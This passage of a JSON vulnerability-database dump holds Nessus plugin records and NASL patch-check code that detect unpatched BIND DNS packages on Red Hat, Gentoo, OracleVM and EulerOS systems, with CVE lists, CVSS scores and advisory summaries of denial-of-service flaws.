preg(pattern:\"^(6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0078\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-debuginfo-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-debuginfo-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-devel-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-devel-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-devel-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-devel-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-libs-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-libs-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-libs-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:08:09", "description": "The remote host is affected by the vulnerability described in GLSA-201510-01 (BIND: Denial of 
Service)\n\n A vulnerability has been discovered in BIND's named utility leading to a Denial of Service condition.\n Impact :\n\n A remote attacker may be able to cause Denial of Service condition via specially constructed zone data.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-10-19T00:00:00", "type": "nessus", "title": "GLSA-201510-01 : BIND: Denial of Service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-5986"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bind", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201510-01.NASL", "href": "https://www.tenable.com/plugins/nessus/86435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201510-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86435);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-5986\");\n script_xref(name:\"GLSA\", value:\"201510-01\");\n\n script_name(english:\"GLSA-201510-01 : BIND: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201510-01\n(BIND: Denial of Service)\n\n A vulnerability has been discovered in BIND's named utility leading to\n a Denial of Service condition.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service condition via\n specially constructed zone data.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201510-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All BIND users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/bind-9.10.2_p4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bind\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/bind\", unaffected:make_list(\"ge 9.10.2_p4\"), vulnerable:make_list(\"lt 9.10.2_p4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"BIND\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:57:36", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n\n - Fix (CVE-2016-1285, CVE-2016-1286)\n\n - Fix (CVE-2015-8704)\n\n - Fix (CVE-2015-8000)\n\n - Fix (CVE-2015-5722)\n\n - Fix (CVE-2015-5477)\n\n - Remove files backup after patching (Related: #1171971)\n\n - Fix CVE-2014-8500 (#1171971)\n\n - fix race condition in socket module\n\n - fix 
(CVE-2012-5166)\n\n - bind-chroot-admin: set correct permissions on /etc/named.conf during update\n\n - fix (CVE-2012-4244)\n\n - fix (CVE-2012-3817)\n\n - fix (CVE-2012-1667)\n\n - fix (CVE-2012-1033)", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2016-06-22T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bind (OVMSA-2016-0055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2016-0055.NASL", "href": "https://www.tenable.com/plugins/nessus/91739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0055.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91739);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1033\", \"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2014-8500\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\");\n script_bugtraq_id(51898, 53772, 54658, 55522, 55852, 71590);\n\n script_name(english:\"OracleVM 3.2 : bind (OVMSA-2016-0055)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing 
necessary patches to address\ncritical security updates :\n\n - Fix issue with patch for CVE-2016-1285 and CVE-2016-1286\n found by test suite\n\n - Fix (CVE-2016-1285, CVE-2016-1286)\n\n - Fix (CVE-2015-8704)\n\n - Fix (CVE-2015-8000)\n\n - Fix (CVE-2015-5722)\n\n - Fix (CVE-2015-5477)\n\n - Remove files backup after patching (Related: #1171971)\n\n - Fix CVE-2014-8500 (#1171971)\n\n - fix race condition in socket module\n\n - fix (CVE-2012-5166)\n\n - bind-chroot-admin: set correct permissions on\n /etc/named.conf during update\n\n - fix (CVE-2012-4244)\n\n - fix (CVE-2012-3817)\n\n - fix (CVE-2012-1667)\n\n - fix (CVE-2012-1033)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-June/000477.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-libs-9.3.6-25.P1.el5_11.8\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-utils-9.3.6-25.P1.el5_11.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2021-12-23T02:33:33", "description": "According to the versions of the bind packages installed, the EulerOS 
Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2016-2776)\n\n - A denial of service flaw was found in the way BIND processed certain control channel input. A remote attacker able to send a malformed packet to the control channel could use this flaw to cause named to crash.(CVE-2016-1285)\n\n - A flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.(CVE-2015-4620)\n\n - A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2015-5477)\n\n - A denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NSEC3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.(CVE-2014-0591)\n\n - A denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. 
A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash.(CVE-2015-5722)\n\n - It was found that the lightweight resolver protocol implementation in BIND could enter an infinite recursion and crash when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the 'lwres' statement in named.conf.(CVE-2016-2775)\n\n - A denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.(CVE-2015-8000)\n\n - A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.(CVE-2016-8864)\n\n - A denial of service flaw was found in the way BIND processed a response to an ANY query. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.(CVE-2016-9131)\n\n - A denial of service flaw was found in the way BIND followed DNS delegations. 
A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash.(CVE-2014-8500)\n\n - A flaw was found in the way BIND handled trust anchor management. A remote attacker could use this flaw to cause the BIND daemon (named) to crash under certain conditions.(CVE-2015-1349)\n\n - A denial of service flaw was found in the way BIND parsed signature records for DNAME records. By sending a specially crafted query, a remote attacker could use this flaw to cause named to crash.(CVE-2016-1286)\n\n - A use-after-free flaw leading to denial of service was found in the way BIND internally handled cleanup operations on upstream recursion fetch contexts. A remote attacker could potentially use this flaw to make named, acting as a DNSSEC validating resolver, exit unexpectedly with an assertion failure via a specially crafted DNS request.(CVE-2017-3145)\n\n - A denial of service flaw was found in the way BIND handled query requests when using DNS64 with 'break-dnssec yes' option. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request.(CVE-2017-3136)\n\n - A flaw was found in the way BIND handled TSIG authentication of AXFR requests. A remote attacker, able to communicate with an authoritative BIND server, could use this flaw to view the entire contents of a zone by sending a specially constructed request packet.(CVE-2017-3142)\n\n - A flaw was found in the way BIND handled TSIG authentication for dynamic updates. A remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone, by forging a valid TSIG or SIG(0) signature for a dynamic update request.(CVE-2017-3143)\n\n - A denial of service flaw was discovered in bind versions that include the 'deny-answer-aliases' feature. 
This flaw may allow a remote attacker to trigger an INSIST assert in named leading to termination of the process and a denial of service condition.(CVE-2018-5740)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : bind (EulerOS-SA-2019-1433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2775", "CVE-2016-2776", "CVE-2016-8864", "CVE-2016-9131", "CVE-2017-3136", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bind-libs", "p-cpe:/a:huawei:euleros:bind-libs-lite", "p-cpe:/a:huawei:euleros:bind-license", "p-cpe:/a:huawei:euleros:bind-utils", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1433.NASL", "href": "https://www.tenable.com/plugins/nessus/124936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124936);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-0591\",\n \"CVE-2014-8500\",\n \"CVE-2015-1349\",\n \"CVE-2015-4620\",\n \"CVE-2015-5477\",\n \"CVE-2015-5722\",\n \"CVE-2015-8000\",\n \"CVE-2016-1285\",\n \"CVE-2016-1286\",\n \"CVE-2016-2775\",\n \"CVE-2016-2776\",\n \"CVE-2016-8864\",\n \"CVE-2016-9131\",\n \"CVE-2017-3136\",\n \"CVE-2017-3142\",\n \"CVE-2017-3143\",\n \"CVE-2017-3145\",\n 
\"CVE-2018-5740\"\n );\n script_bugtraq_id(\n 64801,\n 71590,\n 72673,\n 75588\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : bind (EulerOS-SA-2019-1433)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the bind packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet.(CVE-2016-2776)\n\n - A denial of service flaw was found in the way BIND\n processed certain control channel input. A remote\n attacker able to send a malformed packet to the control\n channel could use this flaw to cause named to\n crash.(CVE-2016-1285)\n\n - A flaw was found in the way BIND performed DNSSEC\n validation. An attacker able to make BIND (functioning\n as a DNS resolver with DNSSEC validation enabled)\n resolve a name in an attacker-controlled domain could\n cause named to exit unexpectedly with an assertion\n failure.(CVE-2015-4620)\n\n - A flaw was found in the way BIND handled requests for\n TKEY DNS resource records. A remote attacker could use\n this flaw to make named (functioning as an\n authoritative DNS server or a DNS resolver) exit\n unexpectedly with an assertion failure via a specially\n crafted DNS request packet.(CVE-2015-5477)\n\n - A denial of service flaw was found in the way BIND\n handled queries for NSEC3-signed zones. 
A remote\n attacker could use this flaw against an authoritative\n name server that served NCES3-signed zones by sending a\n specially crafted query, which, when processed, would\n cause named to crash.(CVE-2014-0591)\n\n - A denial of service flaw was found in the way BIND\n parsed certain malformed DNSSEC keys. A remote attacker\n could use this flaw to send a specially crafted DNS\n query (for example, a query requiring a response from a\n zone containing a deliberately malformed key) that\n would cause named functioning as a validating resolver\n to crash.(CVE-2015-5722)\n\n - It was found that the lightweight resolver protocol\n implementation in BIND could enter an infinite\n recursion and crash when asked to resolve a query name\n which, when combined with a search list entry, exceeds\n the maximum allowable length. A remote attacker could\n use this flaw to crash lwresd or named when using the\n 'lwres' statement in named.conf.(CVE-2016-2775)\n\n - A denial of service flaw was found in the way BIND\n processed certain records with malformed class\n attributes. A remote attacker could use this flaw to\n send a query to request a cached record with a\n malformed class attribute that would cause named\n functioning as an authoritative or recursive server to\n crash. Note: This issue affects authoritative servers\n as well as recursive servers, however authoritative\n servers are at limited risk if they perform\n authentication when making recursive queries to resolve\n addresses for servers listed in NS\n RRSETs.(CVE-2015-8000)\n\n - A denial of service flaw was found in the way BIND\n handled responses containing a DNAME answer. A remote\n attacker could use this flaw to make named exit\n unexpectedly with an assertion failure via a specially\n crafted DNS response.(CVE-2016-8864)\n\n - A denial of service flaw was found in the way BIND\n processed a response to an ANY query. 
A remote attacker\n could use this flaw to make named exit unexpectedly\n with an assertion failure via a specially crafted DNS\n response.(CVE-2016-9131)\n\n - A denial of service flaw was found in the way BIND\n followed DNS delegations. A remote attacker could use a\n specially crafted zone containing a large number of\n referrals which, when looked up and processed, would\n cause named to use excessive amounts of memory or\n crash.(CVE-2014-8500)\n\n - A flaw was found in the way BIND handled trust anchor\n management. A remote attacker could use this flaw to\n cause the BIND daemon (named) to crash under certain\n conditions.(CVE-2015-1349)\n\n - A denial of service flaw was found in the way BIND\n parsed signature records for DNAME records. By sending\n a specially crafted query, a remote attacker could use\n this flaw to cause named to crash.(CVE-2016-1286)\n\n - A use-after-free flaw leading to denial of service was\n found in the way BIND internally handled cleanup\n operations on upstream recursion fetch contexts. A\n remote attacker could potentially use this flaw to make\n named, acting as a DNSSEC validating resolver, exit\n unexpectedly with an assertion failure via a specially\n crafted DNS request.(CVE-2017-3145)\n\n - A denial of service flaw was found in the way BIND\n handled query requests when using DNS64 with\n 'break-dnssec yes' option. A remote attacker could use\n this flaw to make named exit unexpectedly with an\n assertion failure via a specially crafted DNS\n request.(CVE-2017-3136)\n\n - A flaw was found in the way BIND handled TSIG\n authentication of AXFR requests. A remote attacker,\n able to communicate with an authoritative BIND server,\n could use this flaw to view the entire contents of a\n zone by sending a specially constructed request\n packet.(CVE-2017-3142)\n\n - A flaw was found in the way BIND handled TSIG\n authentication for dynamic updates. 
A remote attacker\n able to communicate with an authoritative BIND server\n could use this flaw to manipulate the contents of a\n zone, by forging a valid TSIG or SIG(0) signature for a\n dynamic update request.(CVE-2017-3143)\n\n - A denial of service flaw was discovered in bind\n versions that include the 'deny-answer-aliases'\n feature. This flaw may allow a remote attacker to\n trigger an INSIST assert in named leading to\n termination of the process and a denial of service\n condition.(CVE-2018-5740)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1433\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72d96ad2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3143\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 